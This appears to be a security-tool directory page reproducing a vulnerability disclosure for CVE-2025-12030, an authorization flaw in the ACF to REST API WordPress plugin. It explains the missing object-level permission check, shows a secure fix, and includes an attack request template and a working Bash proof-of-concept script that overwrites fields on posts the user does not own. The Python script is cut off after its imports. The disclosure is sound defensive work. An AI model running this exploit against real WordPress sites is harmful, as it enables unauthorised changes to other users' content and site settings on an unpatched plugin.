Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-12030 — ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Security flaw allowing authenticated users with Contributor-level access to modify ACF fields on objects they do not own. | Kitploit
Tools/GitHubGitHub/snailsploit/cve-2025-12030
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubsnailsploit/cve-2025-12030

CVE-2025-12030

ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Security flaw allowing authenticated users with Contributor-level access to modify ACF fields on objects they do not own.

View Repository
164 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-12030: Insecure Direct Object Reference in ACF to REST API WordPress Plugin

CVE CVSS Score WordPress Plugin CWE-639 Wordfence

Keywords: CVE-2025-12030, ACF to REST API vulnerability, IDOR, WordPress security, authenticated exploit, WordPress plugin vulnerability, CWE-639, ACF field modification, authorization bypass, WordPress CVE 2025, Advanced Custom Fields, REST API security

Table of Contents

  • Overview
  • Vulnerability Details
  • Technical Analysis
  • Attack Vector
  • Proof of Concept
  • Remediation Guide
  • Detection
  • CVSS Metrics
  • References
  • Credits
  • Security Contact

Overview

ACF to REST API WordPress Plugin IDOR Vulnerability (CVE-2025-12030) - Security flaw allowing authenticated users with Contributor-level access to modify ACF fields on objects they do not own.

An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the ACF to REST API WordPress Plugin that allows authenticated attackers with minimal privileges to modify ACF fields across the entire WordPress installation.

Discovered by: Kai Aizen (SnailSploit)
Published: January 6, 2026
CVSS Score: 4.3 (Medium)
CWE: CWE-639 - Authorization Bypass Through User-Controlled Key
Plugin: ACF to REST API
Plugin Slug: acf-to-rest-api
Attack Type: Insecure Direct Object Reference (IDOR)
Required Privileges: Contributor+ (Authenticated Attack)

Vulnerability Details

Description

The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options).

Impact

This vulnerability allows authenticated attackers with Contributor-level access and above to:

  • Modify ACF fields on posts they do not own - Bypass post ownership restrictions
  • Modify ACF fields on any user account - Including administrator accounts
  • Modify ACF fields on comments - Alter comment metadata
  • Modify ACF fields on taxonomy terms - Change category/tag custom fields
  • Modify the global options page - Access site-wide ACF options without manage_options capability

All modifications are possible via the /wp-json/acf/v3/{type}/{id} REST API endpoints.

Affected Versions

  • Vulnerable: All versions ≤ 3.3.4
  • Patched: ⚠️ No known patch available

CVSS v3.1 Metrics

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
MetricValue
Attack VectorNetwork (AV:N)
Attack ComplexityLow (AC:L)
Privileges RequiredLow (PR:L)
User InteractionNone (UI:N)
ScopeUnchanged (S:U)
ConfidentialityNone (C:N)
IntegrityLow (I:L)
AvailabilityNone (A:N)

CVSS v3.1 Breakdown:

  • Attack Vector (AV): Network - The vulnerability can be exploited remotely over a network
  • Attack Complexity (AC): Low - No special conditions are required for exploitation
  • Privileges Required (PR): Low - Requires Contributor-level authentication
  • User Interaction (UI): None - The exploit works without any user interaction
  • Scope (S): Unchanged - The vulnerability only affects the vulnerable component
  • Confidentiality Impact (C): None - No information disclosure
  • Integrity Impact (I): Low - Unauthorized modification of ACF fields
  • Availability Impact (A): None - No availability impact

Technical Details

Vulnerability Root Cause

The vulnerability exists in the update_item_permissions_check() method which performs insufficient authorization:

// Vulnerable code pattern (simplified)
public function update_item_permissions_check( $request ) {
    // VULNERABLE: Only checks generic edit_posts capability
    if ( current_user_can( 'edit_posts' ) ) {
        return true;
    }
    return false;
}

The proper implementation should check object-specific permissions:

// Secure implementation pattern
public function update_item_permissions_check( $request ) {
    $id = $request->get_param( 'id' );
    $type = $request->get_param( 'type' );
    
    switch ( $type ) {
        case 'post':
            return current_user_can( 'edit_post', $id );
        case 'user':
            return current_user_can( 'edit_user', $id );
        case 'option':
            return current_user_can( 'manage_options' );
        // ... other object types
    }
    return false;
}

Vulnerable Endpoints

EndpointTargetRequired Capability (Should Be)
/wp-json/acf/v3/posts/{id}Postsedit_post($id)
/wp-json/acf/v3/pages/{id}Pagesedit_page($id)
/wp-json/acf/v3/users/{id}Usersedit_user($id)
/wp-json/acf/v3/comments/{id}Commentsedit_comment($id)
/wp-json/acf/v3/terms/{taxonomy}/{id}Termsedit_term($id)
/wp-json/acf/v3/options/{option}Optionsmanage_options

Attack Vector

PUT/POST /wp-json/acf/v3/{type}/{id}
Authorization: Basic <contributor_credentials>
Content-Type: application/json

{
    "fields": {
        "field_name": "malicious_value"
    }
}

The vulnerability can be exploited through the WordPress REST API by any authenticated user with at least Contributor role.

Proof of Concept

⚠️ For Educational and Authorized Testing Purposes Only

Bash PoC

#!/bin/bash
# CVE-2025-12030 PoC - ACF to REST API IDOR

TARGET_URL="$1"
USERNAME="$2"
APP_PASSWORD="$3"
TARGET_POST_ID="$4"

if [ -z "$TARGET_URL" ] || [ -z "$USERNAME" ] || [ -z "$APP_PASSWORD" ] || [ -z "$TARGET_POST_ID" ]; then
    echo "Usage: $0 <target_url> <username> <app_password> <post_id>"
    echo "Example: $0 https://example.com contributor_user xxxx-xxxx-xxxx 42"
    exit 1
fi

echo "[*] CVE-2025-12030 - ACF to REST API IDOR PoC"
echo "[*] Target: $TARGET_URL"
echo "[*] Target Post ID: $TARGET_POST_ID"
echo ""

# Encode credentials
AUTH=$(echo -n "$USERNAME:$APP_PASSWORD" | base64)

# Step 1: Read current ACF fields (verify access)
echo "[*] Step 1: Reading current ACF fields..."
curl -s -X GET "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID" \
  -H "Authorization: Basic $AUTH" \
  | python3 -m json.tool

echo ""

# Step 2: Attempt to modify ACF fields on post we don't own
echo "[*] Step 2: Attempting to modify ACF fields on post $TARGET_POST_ID..."
RESPONSE=$(curl -s -X POST "$TARGET_URL/wp-json/acf/v3/posts/$TARGET_POST_ID" \
  -H "Authorization: Basic $AUTH" \
  -H "Content-Type: application/json" \
  -d '{"fields":{"test_field":"CVE-2025-12030_IDOR_TEST"}}')

echo "$RESPONSE" | python3 -m json.tool

echo ""
if echo "$RESPONSE" | grep -q "CVE-2025-12030_IDOR_TEST"; then
    echo "[!] VULNERABLE: Successfully modified ACF fields on post we don't own!"
else
    echo "[+] Not vulnerable or modification failed"
fi

Python PoC

#!/usr/bin/env python3
"""
CVE-2025-12030 - ACF to REST API IDOR PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json
import base64
Download Tool